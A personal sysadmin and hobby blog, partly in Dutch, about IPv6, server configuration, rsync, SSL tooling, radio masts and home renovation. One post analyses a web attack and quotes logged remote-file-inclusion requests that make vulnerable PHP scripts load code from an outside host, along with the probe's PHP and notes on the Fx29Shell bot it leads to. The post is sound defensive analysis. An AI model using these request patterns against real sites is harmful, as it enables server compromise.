Work on home server greenblatt: time for less disks with more storage. So I bought two sata disks, one huge one to store the camera archive and scratch files, and one for the system and home directories. The choice for two disks is so the one with the camera archive and the scratch files can fall asleep when not in use, to save a bit of power. Installing both new disks at once wasn't going to happen due to space and cabling considerations so I started with the big one. When that one is done I can remove three pata disks from the system. I also updated the system bios to the latest version which made the system clock a lot more stable, ntpd now runs without having to use tickadj. Bios updates are easy these days: this bios can update itself from a USB stick. I chose logical volume management (lvm2) again for managing the big disks so it will be easy to expand storage when needed without getting a big tree of filesystem mounts.

Anybody know any leads in receiving data from a weather station which uses "instant transmission" on 868 MHz? I'd like to receive data from such a weather station. In linux, on the server. Some device which would receive the data and present it via a serial port would be great.
Update: the wonderful thing about standards.. I learned that there is no standard for data from weather stations on 868 MHz and that a sensor from brand A will not be received by a receiver from brand B. Time to be more specific: the weather station is a TFA-Dostmann "Stratos". I already e-mailed a technical contact at TFA-Dostmann about this.
Update 2010-01-14: Answer from TFA-Dostmann: it is impossible to receive the data from that weather station on a computer.

Yesterday during the meeting of the hcc pcgg netwerkgroep I saw something which I could not research at the time and it bugs me: one person had Windows 7 running and the network connections screen said "IPv4 Connectivity: Internet" and "IPv6 Connectivity: Local". But that is the wrong answer: Due to my work on the openvpn ipv6 tunnel there should be full IPv6 Internet access. So now this is bugging me and I'm trying to find out how exactly Windows 7 determines whether IPv6 is 'local' or 'Internet'. The system was on the wireless network and the connection just started to work so maybe IPv6 router announcements with a global IPv6 address were missing. Or maybe more is needed like a v6 nameserver.

The Netherlands, Vlieland with less snow
Image credit: NASA/GSFC, MODIS Rapid Response

More satellite image browsing: the Modis rapid response system image gallery offers a lot. Nice detail in the latest images showing the Netherlands such as the Aqua/Modis pass at 2010-01-08 12:45 UTC: Vlieland has a lot less snow!.

Image credit: NERC Satellite Receiving Station, Dundee University, Scotland

Interesting snow cover in the Netherlands, with more coming up. This satellite image from this morning shows a serious white cover and some clouds. The big rivers are visible as darker lines and the ice growth on parts of the IJsselmeer shows.

I tried to use the --filter option in rsync but I was a bit baffled by the syntax and the manpage is nice but I couldn't understand. I wanted certain directories completely, other directories default excluded and certain files in one directory but not all. After some trail and error and talking to the teddybear:

rsync -rvv --progress /home/koos/rsyncsource/ /home/koos/rsyncdest --filter='merge /home/koos/rsyncfilter'

And in the filter file name things to include and exclude:

+ /wel/
- /niet/
+ /random/file
- /random/*

And the result is what I want:

$ ~/bin/testrsync 
building file list ... 
[sender] showing directory wel because of pattern /wel/
[sender] hiding directory niet because of pattern /niet/
[sender] hiding file random/niet because of pattern /random/*
[sender] showing file random/file because of pattern /random/file
7 files to consider
delta-transmission disabled for local transfer or --whole-file
random/
random/file
           0 100%    0.00kB/s    0:00:00 (xfer#1, to-check=4/7)
wel/
wel/file1
           0 100%    0.00kB/s    0:00:00 (xfer#2, to-check=2/7)
wel/file2
           0 100%    0.00kB/s    0:00:00 (xfer#3, to-check=1/7)
wel/file4
           0 100%    0.00kB/s    0:00:00 (xfer#4, to-check=0/7)
total: matches=0  hash_hits=0  false_alarms=0 data=0

sent 319 bytes  received 126 bytes  890.00 bytes/sec
total size is 0  speedup is 0.00

Now to do this on a filesystem with 151000 files.

Google knows where your AP lives, and it's not that hard to query it! Geolocation API Network Protocol can work based on a query with one AP mac address. Testing it with a random access-point near work gives me: http://samy.pl/mapxss/?mac=00%3A1A%3A1E%3A15%3A90%3AE2. Found via Hacker pilfers browser GPS location via router attack - The Register where the user is not asked for permission to trace the location when a wireless router is used. And indeed: 'Scary how accurate it is'.

The year 2010 seems to be an unfathomable far future, I just found another Y2.01K problem. The zonecheck tool gives a warning which reads '2010 is not a valid year':

w> The format of the serial number is not YYYYMMDDnn
 | Ref: RFC1912 (p.3)
 |   The recommended syntax is YYYYMMDDnn (YYYY=year, MM=month, DD=day,
 | nn=revision number).
 `----- -- -- - -  -
 :   The serial 2010010502 doesn't seem to be in the YYYYMMDDnn format.
 `..... .. .. . .  .

And the code indeed shows:

    # DESC: recommanded format for serial is YYYYMMDDnn
    def chk_soa_serial_fmt_YYYYMMDDnn(ns, ip)
        serial = soa(ip).serial
        return true if (serial > 1999000000) && (serial < 2010000000)
        { 'serial' => serial }
    end

The far future is happening today.
Filed as Ubuntu bug #503501.

Nieuws maken kan ook prima in Nederland. Vanmorgen in het ontbijtnieuws en ook in de Volkskrant: 'Drankmerken redden imago met voorlichting’ met:

Producenten van alcoholische dranken die hameren op het verantwoord gebruik van alcohol, doen dat alleen om hun eigen imago op te vijzelen.
Dat stelt STAP, het Nederlands instituut voor alcoholbeleid

Nee, STAP is gewoon de "Stichting Alcohol Preventie". En dan is het ineens een stuk duidelijker waar deze mening vandaan komt. Een moderne uitvoering van de blauwe knoop dus. Maar als je jezelf een beetje neutraal benoemd als 'instituut voor alcoholbeleid' en mooie rapporten schrijft dan lijk je ineens geloofwaardiger en nemen het ANP en wat kranten je zwaar bevooroordeelde rapport over. Uit de categorie "wij van wc-eend adviseren wc-eend".

The well monitored heating system worked a lot better during the night, so the problems are fixed. Only the heater pump ran a few times which I think is part of the frost-protection. The isolation in our house is good: the living room temperature only dropped from 19⁰C to 16.8⁰C over the whole night while it was below 0⁰C outside.

Hot water system fixed: the 3-way valve controlling how the heating/boiler system heats water was broken due to calcium buildup. Now replaced and suddenly things work as expected again.

A day with temperatures staying below 0 ⁰C and the first working day is not the right day to call the heating company about a hot water problem. They sounded very very busy on the phone

More scientific research into the problems with the heater show that the sensor detecting hot water being used seems to be malfunctioning: the system starts for hot water use about every 5 minutes even when not a drop of water is used in the house. Time to call for a repair. I hope the company which does repairs to heating installations isn't too busy with problems due to the current temperatures, those are well below freezing at the moment.

Fireworks launch

The change of the year is celebrated in the Netherlands with fireworks, it is the one day per year all people of at least 16 years are allowed to light fireworks.

And I wish everybody reading this a great new year!

During all the work in the house some of the 1-wire temperature sensors were disabled and removed to avoid damage. Today I did some work on the house and re-installed them. The sensor in the living room is now installed inside the room thermostat so it's hidden and should give the same reading as the thermostat. I also re-installed the temperature sensor in the crawlspace which will show up in the sensors at home overview.

Ik heb toegegeven en voor mezelf een wikipedia account aangemaakt zodat ik de ontbrekende gegevens over de RTBF en VRT dvb-t uitzendingen kon toevoegen aan de pagina over DVB-T frequenties. Het blijft me opvallen dat deze informatie zeer slecht te vinden is. Dan maar wat extra google juice voor deze informatie : DVB-T guard rate, coding, error correction for VRT / RTBF Belgium.

Y2.01K problem: SpamAssassin had a rule since 2006 that e-mail with a date in the 'far future' was likely spam. The 'far future' was defined as 2010-2099. So today that rule started firing, leading to missed e-mail. Documentation for SpamAssassin Rule: FH_DATE_PAST_20XX. Time for an update there...

VLC can be a bit hairy to configure, but with some trial and error and a bit of google juice I found the right playlist file to instantly play radio2 from multiplex 1:

$ cat digitennemux1-radio2.vlc 
#EXTM3U
#EXTVLCOPT:dvb-adapter=0
#EXTVLCOPT:dvb-frequency=706000000
#EXTVLCOPT:program=1113
dvb://

Use with vlc --m3u-extvlcopt digitennemux1-radio2.vlc and enjoy the Top2000. Without the --m3u-extvlcopt vlc finds those commands scary.

Maandag was de Oliebollentocht 2009 van de NVHPV. Als rijder van een 'open' ligfiets mochten we niet meerijden maar we zijn wel op het Domplein en bij Vleuten gaan kijken naar het voorbijrijden van alle velomobielrijders wat natuurlijk zeer fotogeniek is. Op het Domplein was de 'foto-opportunity' waar ook pers voor uitgenodigd was. Mijn dag was ook weer helemaal goed: ik werd ook aangezien voor persfotograaf. Oliebollentocht 28 December 2009 foto's Koos van den Hout (speciaal voor Oscar).

Nog een paar zendmast foto's: tijdens onze ligfietsvakantie door Duitsland zijn we ook langs de Sender Höhbeck gefietst. Op 12 Augustus 2009 heb ik Sender Höhbeck met zendmasten Gartow 1 en Gartow 2 gefotografeerd. Toen ik thuis achteraf ging zoeken welke masten we gezien hebben stond er volgens de wikipedia pagina nog maar 1, na goed lezen bleek Gartow 1 op 20 Augustus 2009 opgeblazen te zijn. Aan deze zendmasten zat een hoop koude oorlog historie, ze onderhielden een televisie, radio en telefoonverbinding tussen West-Duitsland en West-Berlijn. Daarnaast was het ook de zender voor de ZDF in de regio waardoor deze 'toevallig' ook in een aardig stuk van de voormalige DDR te ontvangen was.

Nog wat foto's van de Gerbrandytoren: zo ken ik de Gerbrandytoren vanuit Nieuwegein van vroeger en de Gerbrandytoren als de grootste kerstboom ter wereld.

Meer bijgewerkte zendmast foto's: Zendmast Wieringermeer is uitgebreid met omschrijvingen van delen van de mast aan de hand van het FM Antenne hoogte overzicht van Radio en TV Zenders in Nederland.

Zomaar tijd gehad om uitgebreid zendtoren foto's uit te zoeken. Eerste resultaat, de foto's van zendmast Lopik te IJsselstein / Gerbrandytoren zijn uitgebreid met foto's van meer antennes en gegevens erover. Het was even zoeken maar met behulp van Radio en TV Zenders in Nederland en Zenders Lopik, IJsselstein van Hein ten Horn is de pagina goed bijgewerkt. Nu nog tijd vinden om wat foto's te maken van deze toren als de grootste kerstboom van de wereld want het is ze dit jaar weer gelukt.

Sommige mensen blijven zo dom om het e-mail adres van een ander in te vullen op een site om zo van eventuele reclame af te komen. Maar soms kan dat vervelende effecten hebben. Zo kreeg ik net een wel heel duidelijk verdwaald mailtje:

   Beste klant,
   U hebt een opwaardeervoucher besteld bij Lebara NL WEB Reloads op 22
   december 2009 15:00:23 CET.
   Als u deze opwaardeervoucher wilt gebruiken, belt u gratis naar 1244
   met opwaardeercode 27964964967133.

Maar dat heb ik helemaal niet gedaan. Ik denk dat er iemand nu heel boos probeert de klantenservice van Lebara te bellen.

Winter picture time:

Sparrow visiting the birdfeeder

The temperature sensor connected to the heater is working nicely and tells us the problem with the heater is only in the hot-water producing part.
And the picture is a nice update for the 1-wire projects page.

Toen ik aan het kijken was naar VPS hosting met IPv6 support kwam ik ook informatie tegen dat OpenVZ en IPv6 slecht samengaat. Maar Henk van de Kamer is er eens mee bezig gegaan en kwam er achter dat IPv6 onder OpenVZ prima aan de gang te krijgen is. Kortom: geen belemmering voor VPS aanbieders die OpenVZ gebruiken om ook IPv6 aan te bieden.

Ik was even aan het zoeken naar wat extra informatie voor mijn foto's van de zendmast Lopik te IJsselstijn / Gerbranditoren want ik wist van deze foto niet wat de antennes net onder de top zijn. Gevonden op Zenders Lopik, IJsselstein van Hein ten Horn (foto daar is van voor de ontmanteling van de Nederland 1 VHF zender): het zijn de antennes van Radio M op 93.1 MHz FM.

3FM Serious Request volgen in hoge kwaliteit? Dan heb je IPv6 nodig! De mensen van omroep.nl streaming hebben de Serious Request streams ook via IPv6 beschikbaar gemaakt en de 'main' stream is alleen via IPv6 op 3 megabit te krijgen.

Natuurlijk wil je IPv6, maar dit is een extra argument!

Stream URLs:
http://www.omroep.nl/live/ipv6/3fm_sr2009_main.asx <- Hoge kwaliteit via IPv6
http://www.omroep.nl/live/ipv6/3fm_sr2009_brievenbus.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_cam1.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_djcam.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_buitenshot.asx

Ik las vanmorgen in de Volkskrant dat 'Teletext' in Engeland er mee opgehouden is: 4e tussenkopje in dit artikel uit het betaalde archief van de volkskrant. Ik vond het al wat verwarrend omdat het ging over 'Teletext' terwijl de dienst bij de BBC 'Ceefax' heet. De schrijver van het artikel leek ook aan te nemen dat het over de BBC ging:

In Nederland is Teletekst onderdeel van de Publieke Omroep, terwijl de dienst in het Verenigd Koninkrijk zichzelf moest bedruipen met inkomsten uit advertenties.

Dit is alleen geldig voor de diensten van 'Teletext UK' die op de commerciële TV-zenders opereert. Ceefax is apart en wordt betaald uit de beruchte 'TV License' in Engeland.

Enfin, gelijk eens gekeken op BBC 1/2 en daar zag ik ook geen Ceefax meer. Ik ging er van uit dat iemand bij Ziggo het bericht ook niet helemaal gesnapt had en maar de hele zaak had uitgezet maar nu ik even zoek in nl.media.tv via google groups lijkt het er op dat het al veel langer uitstaat. Vreemd, ik dacht dat ik een paar weken terug nog het uitzendschema van Top Gear had nagekeken op BBC2 Ceefax.
Update 2009-12-17: Alleen pagina 888 (ondertiteling) doet het nog, wat overeenkomt met meldingen in nl.media.tv dat die ondertiteling uit de dvb ondertiteling komt (is apart van teletekst) en dan vervolgens als teletekstpagina 888 toegevoegd word aan het analoge signaal.

Snow this morning

Snow! And the associated traffic mess in the Netherlands.

We hung up a bird-feeder in the backyard last weekend and it is now very popular since it got cold the last few days, making for a few nice pictures this morning. They look a lot better at full size.

Sparrow in the backyard

Sparrow in the backyard

Our heating seems to be having problem, probably related to the changes recently. But to diagnose the problem completely we need to see what is happening. So one of the one-wire temperature sensors is now tie-wrapped to the output pipe of the central heating and measurements are logged.

Wardriving results 24 November - 13 December: 3026 new networks with gps locations. The wardriving box gets taken out again on some trips.

It's that xsnow time of year. I wanted to compile it for our students and staff to use and found a major Makefile and a real Imakefile (remember those?):

$ wc Makefile  Imakefile 
  957  2413 26799 Makefile
    7    21   172 Imakefile

Trying to find the 'real' problem I managed to reduce all that to:

xsnow: xsnow.o toon_root.o
        gcc -o xsnow xsnow.o toon_root.o -lm -lXpm -L/usr/X11R6/lib

imake gave us somewhat overkill Makefiles...

De schilder had de cat6 connectoren meegenomen (zonder afplaktape erover) dus ik heb de nodige verf er uitgepeutert en daarna connectors aan de kabels geknepen om ze te testen en gelijk te labelen. Gelukkig werkte alles op gigabit snelheid zonder fouten, maar ik denk niet dat er in de Category 6 specificaties ruimte is voor verf in de connector.

So Google announce their public DNS servers. First thing I try:

koos@greenblatt:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.

Too bad! Do they support AAAA records at all?

koos@greenblatt:~$ dig +short @8.8.8.8 idefix.net aaaa
2001:888:1011::694

Yes. But according to the FAQ item on IPv6 it does not support IPv6 as transport at all. Weird for google to roll out a new service so close to the network and not support IPv6.

I follow the comic strip Questionable Content and the latest character added Cosette is promising to be a lot of fun.

Vandaag heb ik voor het eerst gekookt in de nieuwe keuken. Dat is genieten, een goeie inductie-kookplaat in plaats van camping-branders.

Vandaag is de nieuwe keuken geinstalleerd waarmee het ineens erg mooi uit gaat zien. De foto's van de verbouwing zijn bijgewerkt.

After finding shortcomings in the verification by openssl s_client I tried the gnutls command-line client gnutls-cli. The upside of gnutls-cli is that it does use IPv6 when available. But.. gnutls-cli decides not to trust a server when using the same certificate set as used in testing openssl s_client.

~$ gnutls-cli --x509cafile /etc/ssl/certs/ca-certificates.crt -p imaps imaps.cs.uu.nl
..
*** Verifying server certificate failed...

versus

:~$ openssl s_client -verify 10 -CAfile /etc/ssl/certs/ca-certificates.crt -connect imaps.cs.uu.nl:imaps
..
    Verify return code: 0 (ok)

Weird. I would not be completely surprised when my own root CA had issues in very strict utilities but the chain used for the work servers is very well tested.

De winnaars van de IPv6 awards zijn bekend gemaakt vanmiddag:

Categorie ISPs: BIT

Categorie bedrijfsleven: Watchmouse

Categorie publicatie: Arnout Veerman

Categorie onderwijs: Hogeschool Utrecht en Universiteit van Amsterdam

Categorie particulieren: Jasper Wonnink

Door diverse sponsors zijn mooie prijzen beschikbaar gesteld. Persbericht IPv6 taskforce over de awards (PDF)

Zelf ben ik dus buiten de prijzen gevallen. Maar veel belangrijker is dat dit weer aandacht verzorgt voor IPv6. De uitreiking was onderdeel van het jaarcongres ECP-ECN en daar heb ik mensen uit diverse branches gesproken die nu door beginnen te krijgen dat IPv6 een onderwerp is om rekening mee te houden. Voor de meesten is alles 'netwerk' of 'Internet' maar die moeten er toch rekening mee houden dat dat 'Internet' wel aan het veranderen is.

I like my SSL verification tools paranoid, and it seems openssl s_client -verify isn't paranoid enough. The man page reports:

BUGS

       The -verify option should really exit if the server verification
       fails.

I'd like added "the hostname in the certificate is not verified". I ran a little test server to test for the right way to configure the SSL certificates in openldap server and noticed I got the verification to work even when I was connecting to the wrong name.

Met een folder over het tatoeëeren van je burgerservicenummer keurig in de stijl van andere folders van de overheid (PDF formaat) vraagt Het Nieuwe Rijk aandacht voor de opslag van vingerafdrukken.

Uit de beweegredenen van deze groep:

Het verbaast niet dat de aanleg en gebruik van deze vingerafdrukkendatabase op gespannen voet staat met het grondrecht op privacy, zoals vastgelegd in artikel 10 van de Nederlandse Grondwet en artikel 8 van het Europees Verdrag voor de Rechten van de Mens. Ook het College Bescherming Persoonsgegevens (CBP), verschillende onderzoekers, hoogleraren en deskundigen op het gebied van informatica, rechtspsychologie, computerbeveiliging en zelfs de Europese Toezichthouder voor Gegevensbescherming hebben zich zeer kritisch uitgelaten over deze ontwikkeling.

De Nederlandse regering wil het doen lijken alsof zij deze database op grond van Europese wetgeving aanlegt. Maar dat is niet het geval.

Opvallend is hoe in de reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties alleen ingegaan wordt op de folder en de eventuele misleiding. Deze reactie is gepubliceerd toen de makers van de folder en het onderwerp waar aandacht voor gevraagd wordt nog onbekend waren, dus misschien komt daar nog verandering in.

Ik hoop dat de ophef over de verwijzing naar de holocaust niet teveel af zal leiden (of misbruikt zal worden om af te leiden) van het onderwerp waar het over gaat: de ongeoorloofde opslag van vingerafdrukken.
Update : Ook in de tweede reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties wordt absoluut voorbijgegaan aan het doel van de actie. Op zijn minst is het jammer dat ze daar niet op ingaan. Ondertussen stromen de ondertekeningen van de petitie tegen de opslag van de vingerafdrukken binnen.

I was replacing ssl certificates on a lot of servers and got it working everywhere except on our ldap server. The SSL certificate chain wasn't given out so there was no link between a trusted root and the certificate on the server. I had it configured:

TLSCACertificateFile /etc/openldap/ssl/cacert.pem
TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the certificate in servercrt.pem and the intermediate certificates in cacert.pem. But that was a config from an older server which uses OpenSSL, including openssl libraries (libssl). The newer ldap server uses the gnu tls libraries (libgnutls) which really need:

TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the server certificate and the entire chain together in servercrt.pem. Something to keep in mind, so I documented it on our internal wiki.

Wardriving results 28 September - 23 November: 1831 new networks with GPS locations. Not much wardriving happening due to the construction work at home.

I realized there is one piece of software running on my server which has a small chance of having a known leak because it is a widely used package: Serendipity powers the hcc!pc gg netwerkgroep website and I hadn't upgraded it recently. A very small chance, since security is a very important part of the Serendipity design. Since upgrading phpBB for Camp Wireless was always a royal pain in the behind I sort of postponed this process. But after the serious search for any security flaw in my website I searched on the Serendipity site for an explanation of the upgrade process. And the answer: upgrading Serendipity is very, very easy. More PHP applications should be this easy to upgrade.
Update: A frequent reader notes that I had a bit of a strong opinion: lots of PHP software is easy to upgrade, phpBB is/was just a problem because the templating system is too integrated in the source.

Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:

$ grep -c 90.185.249.111 ~httpd/idefix/logs/access_log
4208

All tries to display http://www.spotmerkezi.com/cache/id1.txt which is a bit of PHP source:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Which will display ShiroHige as one word when run through the php processor.

All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??

A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

To: feelcomz@gmail.com
Subject: Fx29Shell http://server.name/vulnerable.url by 10.2.1.1

Boss, there was an injected target on http://server.name/vulnerable.url by 10.2.1.1

Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on 90.185.249.111 it's probably a script running on that server which got hacked from a third place.

I'm building a new box at work and I waited a bit with ratelimiting ssh connections (ssh is already configured to only allow valid accounts with pre-established keys). The result of one night..:

# egrep -c 'sshd.*(Invalid user|not allowed)' auth.log 
2179

I played with temporary IPv6 addresses recently, the privacy extension where the right half of the address isn't always the same address derived from the ethernet mac address but a random address. I noticed when I set Linux to use the temporary address as preferred address it was listed as 'secondary':

# ip -6 addr ls
1: lo:  mtu 16436 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
22: wlan0:  mtu 1500 qlen 1000
    inet6 2001:888:1011:1:10f3:2799:3587:237e/64 scope global secondary dynamic 
       valid_lft 604544sec preferred_lft 85544sec
    inet6 2001:888:1011:1:21f:e1ff:fe45:2894/64 scope global dynamic 
       valid_lft 2591744sec preferred_lft 604544sec
    inet6 fe80::21f:e1ff:fe45:2894/64 scope link 
       valid_lft forever preferred_lft forever

I thought maybe I can use this to fix my outgoing IPv6 address selection problem. Searching for clues how to change the status of an IPv6 address using the ip command I found: IPv6 Source Address Selection on Linux which answers my question completely, and now I can 'block' the tunnel address completely for outgoing connections:

# ip -6 addr ls dev xs4allipv6
7: xs4allipv6@NONE:  mtu 1480 
    inet6 2001:888:1011::13/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 2001:888:10:11::2/64 scope global deprecated 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:1401/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::525f:c4ca/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:201/64 scope link 
       valid_lft forever preferred_lft forever

The tunnel address is 'deprecated' so it will not be used for outgoing connections but the system still responds to it so routing works. Now the wanted address is chosen when I connect to a system 'nearby' in IPv6 address terms:

tcp6       0      0 2001:888:1011::13:41041 2001:888:0:311:194::119 ESTABLISHED

Zojuist mail binnen: ik heb een nominatie voor de IPv6 awards in de categorie particulieren. De andere genomineerde in deze categorie is Jasper Wonnink van Fix6 die volgens mij minstens even veel kans maakt. Dus ik ben benieuwd.

De nominaties:

Bedrijfsleven	NetMatch, Watchmouse
Overheid & not-for-profit	Stichting DOK, Nederlandse Publieke omroep, Ministerie van Algemene zaken
Onderwijs	Hogeschool Utrecht, Universiteit van Amsterdam
Publicatie	Benjamin Margarita, Arnout Veenman, Marcel van de Kraats
Particulieren	Jasper Wonnink, Koos van den Hout
Internet Service Providers	BIT, Signet, Shock Media, Prolocation

IPv6 awards nominaties op de IPv6 taskforce website
Persaandacht:

• Nominaties van IPv6 Awards bekendgemaakt - Computable

Vanmorgen weer een compleet overbodige fietsers afstappen gezien. Wanneer komt er eens een bordje automobilisten uitstappen en duwen. Bijvoorbeeld op de A2N2 bij Eindhoven.

Power failure this morning at work.. which left us not in the dark (enough emergency lighting) but with a completely silent serverroom. When the power came back we had some hours of work to get everything up and running again. Worst problem was with a number of Xen based virtualhosts, some centos upgrade had suddenly created a network device virbr0 which uses NAT and a local dhcp pool and enslaved all xen domU network interfaces under that bridge with no access to the 'real' network because NAT was not set up so their NFS root mount failed. The details on virbr0:

virbr0    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF
          inet addr:192.168.122.1  Bcast:192.168.122.255

A bit hard to disable, but at the end ifconfig virbr0 down ; brctl delbr virbr0 helps to get rid of the weird bridge, and all domUs will start after that.

Sheldon explains the cloud.

Mijn website heeft meer bezoekers dan die van de Telegraaf via IPv6.
Kijk maar op de 6bone Webserver List. Ontdekt door Henk van de Kamer die ook de telegraaf heeft verslagen.

Na de verhuizing van HCC!net mail (met diverse mailtjes aangekondigd) blijf ik nu zien uit fetchmail:

fetchmail: Server CommonName mismatch: localhost.localdomain != pop.hccnet.nl
fetchmail: Server certificate verification error: self signed certificate

En daar is geen uitleg over in de Veel gestelde vragen over HCC!net mail. Workaround: sslproto ssl23 in de regel voor pop.hccnet.nl zodat er geen TLS gebruikt wordt (ontleend aan How can I tell fetchmail not to use TLS if the server advertises it? Why does fetchmail use SSL even though not configured? - The Fetchmail FAQ). Beter zou natuurlijk zijn als pop.hccnet.nl gewoon een echt certificaat zou hebben.
Opmerkelijk is trouwens de sterk ontbrekende optie om HCC!net support te bereiken via e-mail op de contact pagina. Ik ga geen 60 cent per minuut betalen om ze uit te leggen dat ze het stuk gemaakt hebben.

Twee van mijn favoriete onderwerpen gecombineerd:

$ host www.ligfiets.net
www.ligfiets.net has address 82.94.245.48
www.ligfiets.net has IPv6 address 2001:888:2156::3:1:1

Nu dus ook via ipv6: www.ligfiets.net.

Going old-school today: I wrote a sed script to massage grub.conf to add a windows partition on a second disk. Searching google for has this been done before yields loads of page with handholding on how to add windows by hand to a grub.conf generated by anaconda but no simple 'automated' solution. I am always in favor of letting the computer do the boring work. But a bit of thinking and testing and now sed does the job:

if [ -b /dev/sdb1 ]; then

        cp /boot/grub/grub.conf /boot/grub/grub.conf.pre

        sed -e 's/timeout=5/timeout=30/' -e '/hiddenmenu/a\
title Windows XP (Service Pack 3)\
        rootnoverify (hd1,0)\
        map (hd0) (hd1)\
        map (hd1) (hd0)\
        makeactive\
        chainloader (hd1,0)+1
' -e '/hiddenmenu/d' < /boot/grub/grub.conf.pre > /boot/grub/grub.conf
fi

Everybody knows sed -e 's/../../' but I had to look up 'insert', 'append' and 'delete'.
Update 2009-11-12: Changed insert to append because the previous version inserted windows multiple times with multiple linux kernels. Once is enough. Also moved it from the post-install instructions to the post-reboot script so linux is fully configured before windows gets booted.

Maybe related to the constructionwork at home or to problems with the DSL network to my provider but 29 October was a day of intermittant DSL problems. And indeed, the resulting line quality graph looks 'interesting'.

Something up with sshd? Suddenly I see log entries (formatted for readability) like:

Nov  7 11:14:25 greenblatt sshd[5670]: Bad protocol version identification 'yJ
\316F\306J\226{B\247pvO\030B\330\332\352\257\337:\346\272h^\221\310\215\256C-
\253K\264l\265\320)\022\342\376\221\001?5\343\324\254\304\270\264FB\244#&tX
\3413\332m\352=\327\266\216\333\baZ<\006\267\243\236\214\217@:\021\273/vx\211
\313\362' from 220.225.222.226

I dislike seeing stuff like this.

I'm playing a bit with NDPMon - IPv6 Neighbor Discovery Protocol Monitor, now at version 1.4.0. Sofar, after configuring it in the right configuration file it likes one part of the home network (the wired part). I'm looking at it both from the viewpoint of playing with IPv6 and from the viewpoint of network security: can I use this to trace users of a network. In a large network like the one at work I could imagine ndpmon doing for IPv6 what arpwatch does for IPv4. Combine that with logs from the switches for tracing ethernet addresses and I see possibilities for a big, usable and at the same time manageable and secure network.

All the talk about gopher from the article The Web may have won, but Gopher tunnels on made me try whether I can run a gopher server which is reachable via ipv6. The answer is: yes I can.

gopher://gopher.idefix.net/ reachable via both IPv4 and IPv6.

Update 2009-11-05: and I'm not the first one to think of this. gopher://✎.net/ adds the fun of a punycode url.

Bedrijven niet voorbereid op uitputting webadressen. Alleen al door de term 'webadressen' heb je door dat de auteur wat details gemist heeft, maar we houden het er op dat het IPv6 in het nieuws weet te houden. De quote die ik er even uit wil halen:

Bovendien zijn niet alle bedrijven en organisaties op de hoogte van de noodzaak over te stappen op de nieuwe IP-versie.

Bedrijven roepen zelfs actief dat ze er prima uitkomen met NAT. En het helpt ook niet als Gartner roept dat 'we' ons nog geen zorgen hoeven te maken over IPv6: Gartner: Don't sweat move to IPv6 (heeft iemand toegang tot het originele rapport?). Veel mensen die beslissingen hierover nemen zullen Gartner graag als bron geloven.

CBC Canada has a great special: Berlin Wall: 20 years after the fall. I am glad we visited Berlin this summer and saw all the historic places from up close.

Mijn werkgever, het departement informatica van de Universiteit Utrecht, biedt ook een opleiding tot leraar informatica aan. Totnogtoe hebben ze daar nog niet zo veel reclame voor gemaakt, maar daar komt nu verandering in.

Beetje verstoring in de onweers sensor thuis, er was helemaal geen onweer volgens andere bronnen. Vermoedelijk een gevolg van de sloopwerkzaamheden van maandag.

Met de verbouwing en het boven wonen zaten we ook even na te denken over televisie: het aansluitpunt moet verplaatst worden en we hebben (nog) geen coax van beneden naar boven. Digitenne zou misschien een optie zijn voor tijdelijk maar die doen niet aan abonnementen van minder dan een jaar, terwijl de planning toch echt is dat we dit jaar nog weer normaal wonen en dan weer makkelijk bij de Ziggo kabeltv kunnen waar wel BBC 1 en BBC 2 bij zitten. Dus dan maar een lange verlengkabel (ik heb gelukkig een goede kabel in huis) door het hele trappenhuis voor als we televisie willen kijken en uitleggen dat je NIET op coax kabel mag staan.

I'm happy with my B+M ixon iq light on my recumbent bicycle but some people need more light, for example when cycling through the woods in Finland: Jukan put together a 24-watt 1680 lumen led light monster.
Found via Unreasonably bright bike light apparently hunts deer - Hack a Day (although the deer that seems to be in the resized picture is some bushes in the original picture).

The construction work at home shows a lot of progress at the moment. Tuesday morning work started and now half the back face of the house is already removed. Pictures of the progress with Dutch comments.

